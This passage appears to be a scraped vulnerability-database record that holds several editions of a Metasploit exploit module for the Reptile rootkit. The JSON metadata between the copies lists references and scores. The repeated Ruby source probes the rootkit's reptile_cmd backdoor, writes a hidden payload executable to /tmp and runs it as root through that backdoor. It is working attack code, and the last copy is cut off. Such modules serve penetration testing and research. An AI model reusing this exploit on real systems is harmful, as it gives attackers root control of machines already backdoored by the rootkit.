'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-30T13:15:34", "differentElements": ["modified", "published"], "edition": 117}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-04-30T20:31:26", "history": [], "viewCount": 60, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2037", "ELSA-2020-5670", "ELSA-2020-2040"]}, {"type": "kitploit", "idList": ["KITPLOIT:4040124232926399546", "KITPLOIT:5755801197403835378"]}, {"type": "threatpost", "idList": ["THREATPOST:09C2177EFFD6892EBA7225AC2693E94B"]}, {"type": "mskb", "idList": ["KB4538483", "KB4011104"]}, {"type": "mssecure", "idList": ["MSSECURE:2784625EBE413DA9C161AEFCA84C1820"]}, {"type": "hackread", "idList": ["HACKREAD:8D08510DB426A473A3B8FD4C8BDAF6BC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:016324FD65B4856213491986B667C941"]}, {"type": "redhat", "idList": ["RHSA-2020:2036", "RHSA-2020:2032", "RHSA-2020:2033", "RHSA-2020:2037", "RHSA-2020:2031"]}, {"type": "thn", "idList": ["THN:4A7DB8F1B0072ECE0C1C9F0431DBCC05"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C7923CE93EEC61D0E67C1CEFD1BC6695"]}, {"type": "securelist", "idList": ["SECURELIST:824D6B67843D7BBAF7645750B194C971"]}], "modified": "2020-04-30T20:31:26", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2020-04-30T20:31:26", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-04-30T20:31:26", "differentElements": ["sourceData"], "edition": 118}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-07T12:42:17", "history": [], "viewCount": 60, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-2040", "ELSA-2020-2037"]}, {"type": "exploitdb", "idList": ["EDB-ID:48434"]}, {"type": "kitploit", "idList": ["KITPLOIT:5755801197403835378", "KITPLOIT:4040124232926399546"]}, {"type": "threatpost", "idList": ["THREATPOST:09C2177EFFD6892EBA7225AC2693E94B"]}, {"type": "mskb", "idList": ["KB4011104", "KB4538483"]}, {"type": "mssecure", "idList": ["MSSECURE:2784625EBE413DA9C161AEFCA84C1820"]}, {"type": "hackread", "idList": ["HACKREAD:8D08510DB426A473A3B8FD4C8BDAF6BC"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:016324FD65B4856213491986B667C941"]}, {"type": "redhat", "idList": ["RHSA-2020:2032", "RHSA-2020:2036", "RHSA-2020:2037", "RHSA-2020:2031", "RHSA-2020:2033"]}, {"type": "thn", "idList": ["THN:4A7DB8F1B0072ECE0C1C9F0431DBCC05"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:C7923CE93EEC61D0E67C1CEFD1BC6695"]}, {"type": "securelist", "idList": ["SECURELIST:824D6B67843D7BBAF7645750B194C971"]}], "modified": "2020-05-07T12:42:17", "rev": 2}, "score": {"value": 2.5, "vector": "NONE", "modified": "2020-05-07T12:42:17", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-07T12:42:17", "differentElements": ["sourceData"], "edition": 119}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-07T14:29:24", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2020-5895", "CVE-2020-4429", "CVE-2020-4427", "CVE-2012-0953", "CVE-2020-4428", "CVE-2012-0952", "CVE-2020-9475"]}, {"type": "kitploit", "idList": ["KITPLOIT:3593809043557008899", "KITPLOIT:8126135750183510749"]}, {"type": "threatpost", "idList": ["THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F"]}, {"type": "github", "idList": ["GHSA-JJJR-3JCW-F8V6"]}, {"type": "krebs", "idList": ["KREBS:A4C0ADA7D570C2DB513E3F10F90749E1"]}, {"type": "mskb", "idList": ["KB3203462"]}, {"type": "ubuntu", "idList": ["USN-4353-1"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1980", "ELSA-2020-1998", "ELSA-2020-2040", "ELSA-2020-5674"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704676"]}], "modified": "2020-05-07T14:29:24", "rev": 2}, "score": {"value": 5.6, "vector": "NONE", "modified": "2020-05-07T14:29:24", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-07T14:29:24", "differentElements": ["sourceData"], "edition": 120}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "49f1bb4292928bc341f445326a24948b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-08T12:44:39", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2020-4427", "CVE-2012-0952", "CVE-2020-4428", "CVE-2020-9475", "CVE-2020-4429", "CVE-2012-0953", "CVE-2020-5895"]}, {"type": "kitploit", "idList": ["KITPLOIT:8126135750183510749", "KITPLOIT:3593809043557008899"]}, {"type": "threatpost", "idList": ["THREATPOST:EFC1ED7D43C4F52F844E131EAE00990F"]}, {"type": "github", "idList": ["GHSA-JJJR-3JCW-F8V6"]}, {"type": "krebs", "idList": ["KREBS:A4C0ADA7D570C2DB513E3F10F90749E1"]}, {"type": "mskb", "idList": ["KB3203462"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-1980", "ELSA-2020-5674", "ELSA-2020-1998", "ELSA-2020-2040"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704675"]}, {"type": "ubuntu", "idList": ["USN-4353-1"]}], "modified": "2020-05-08T12:44:39", "rev": 2}, "score": {"value": 4.7, "vector": "NONE", "modified": "2020-05-08T12:44:39", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-08T12:44:39", "differentElements": ["sourceData"], "edition": 121}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "0a9d47caa023f6aa94150395e95d35f9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "2019-12-11T06:48:51", "modified": "2019-12-11T06:48:51", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-08T16:23:25", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2020-7287", "CVE-2020-7267", "CVE-2020-7286", "CVE-2020-7290", "CVE-2019-14898", "CVE-2020-7285", "CVE-2020-7288", "CVE-2020-12680", "CVE-2020-7289", "CVE-2020-11541"]}, {"type": "kitploit", "idList": ["KITPLOIT:4200551780992765798"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:409B5C03C45FF30D2D855EC738BF00FB"]}, {"type": "nessus", "idList": ["FEDORA_2020-0D6B80678A.NASL"]}], "modified": "2020-05-08T16:23:25", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-05-08T16:23:25", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n vprint_line res\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2020-05-08T16:23:25", "differentElements": ["modified", "published"], "edition": 122}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/LOCAL/REPTILE_ROOTKIT_REPTILE_CMD_PRIV_ESC", "hash": "f18553619b12944be84d546c5a109287", "type": "metasploit", "bulletinFamily": "exploit", "title": "Reptile Rootkit reptile_cmd Privilege Escalation", "description": "This module uses Reptile rootkit's `reptile_cmd` backdoor executable to gain root privileges using the `root` command. This module has been tested successfully with Reptile from `master` branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["https://github.com/f0rb1dd3n/Reptile", "https://github.com/f0rb1dd3n/Reptile/wiki/Usage"], "cvelist": [], "lastseen": "2020-05-09T12:10:40", "history": [], "viewCount": 61, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "cve", "idList": ["CVE-2020-7288", "CVE-2020-12680", "CVE-2020-7267", "CVE-2020-11541", "CVE-2020-7287", "CVE-2020-7290", "CVE-2020-7289", "CVE-2020-7285", "CVE-2019-14898", "CVE-2020-7286"]}, {"type": "kitploit", "idList": ["KITPLOIT:4200551780992765798"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:409B5C03C45FF30D2D855EC738BF00FB"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4681.NASL"]}], "modified": "2020-05-09T12:10:40", "rev": 2}, "score": {"value": 5.1, "vector": "NONE", "modified": "2020-05-09T12:10:40", "rev": 2}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/reptile_rootkit_reptile_cmd_priv_esc.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Reptile Rootkit reptile_cmd Privilege Escalation',\n 'Description' => %q{\n This module uses Reptile rootkit's `reptile_cmd` backdoor executable\n to gain root privileges using the `root` command.\n\n This module has been tested successfully with Reptile from `master`\n branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'f0rb1dd3n', # Reptile\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2018-10-29', # Reptile first stable release\n 'References' =>\n [\n ['URL', 'https://github.com/f0rb1dd3n/Reptile'],\n ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']\n ],\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'Notes' =>\n {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_SAFE ]\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def reptile_cmd_path\n datastore['REPTILE_CMD_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless executable? reptile_cmd_path\n vprint_error \"#{reptile_cmd_path} is not executable\"\n return CheckCode::Safe\n end\n vprint_good \"#{reptile_cmd_path} is executable\"\n\n res = cmd_exec(\"echo id|#{reptile_cmd_path} root\").to_s.strip\n vprint_status \"Output: #{res}\"\n\n if res.include?('You have no power here!')\n vprint_error 'Reptile kernel module is not loaded'\n return CheckCode::Safe\n end\n\n unless res.include?('root')\n vprint_error 'Reptile is not installed'\n return CheckCode::Safe\n end\n vprint_good 'Reptile is installed and loaded'\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 8..12}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload...'\n res = cmd_exec \"echo '#{payload_path}&' | #{reptile_cmd_path} root & echo \"\n 